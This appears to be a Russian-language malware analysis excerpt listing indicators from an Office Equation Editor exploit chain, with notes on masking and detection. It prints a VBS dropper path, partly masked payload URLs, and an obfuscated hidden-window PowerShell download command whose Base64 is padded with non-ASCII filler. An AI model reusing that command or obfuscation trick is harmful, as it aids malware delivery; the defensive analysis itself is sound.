Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\swwiamagoodchocolatebuoys.vBS"
- %APPDATA%\swwiamagoodchocolatebuoys.vbs
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\i3nmat9z\config14[1].txt
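- '19#.#.101.150':80
  (Примечание: символы «#» в IP-адресе и в имени узла ниже, по-видимому, скрывают часть значения в самом отчёте. В таком виде эти строки нельзя использовать как готовые индикаторы для блокировки или поиска по журналам — нужны полные значения из исходного анализа.)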
- 'ia#####4.us.archive.org':443
- http://19#.#.101.150/24/swwiamagoodchocolatebuoyssee.tIF
- 'ia#####4.us.archive.org':443
- DNS ASK ia#####4.us.archive.org
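- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
  (Примечание: ключ -Embedding означает, что редактор формул Microsoft (Equation Editor) запущен как COM-сервер, то есть при открытии документа Office с внедрённым объектом формулы. То, что в этом же отчёте запускаются wscript.exe и powershell.exe, характерно для документов, эксплуатирующих уязвимости редактора формул. Сам документ и родительские процессы на странице не показаны, поэтому эту связь нужно подтвердить по дереву процессов.)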
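- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J⍊ ㏋ ㍮ ⮠ ㉂Bp⍊ ㏋ ㍮ ⮠ ㉂G0⍊ ㏋ ㍮ ⮠ ㉂YQBn⍊ ㏋ ㍮ ⮠ ㉂GU⍊ ㏋ ㍮ ⮠ ㉂VQBy⍊ ㏋ ㍮ ⮠ ㉂Gw⍊ ㏋ ㍮ ⮠ ㉂I⍊ ㏋ ㍮ ⮠ ㉂⍊ ㏋ ㍮ ⮠ ㉂9⍊ ㏋ ㍮ ⮠ ㉂C⍊ ㏋ ㍮ ⮠ ㉂⍊ ㏋ ㍮ ⮠ ㉂JwBo⍊ ㏋ ㍮ ⮠ ㉂HQ⍊ ㏋ ㍮ ⮠ ㉂d⍊ ㏋ ㍮ ⮠ ㉂Bw⍊ ㏋ ㍮ ⮠ ㉂... (со скрытым окном)
  (Примечание: значение $Codigo — это Base64, в котором каждая буква «A» заменена вставкой «⍊ ㏋ ㍮ ⮠ ㉂». Если вернуть «A», видимая часть декодируется как UTF-16LE в начало строки «$imageUrl = 'http». Дальше строка в отчёте обрезана, поэтому полный текст скрипта по этой странице восстановить нельзя. Для обнаружения полезен сам признак: командная строка powershell.exe с параметром -command и длинной Base64-подобной строкой, разбавленной повторяющимися не-ASCII символами. Раскодированный текст обычно попадает в журнал PowerShell Script Block Logging (событие 4104), если он включён.)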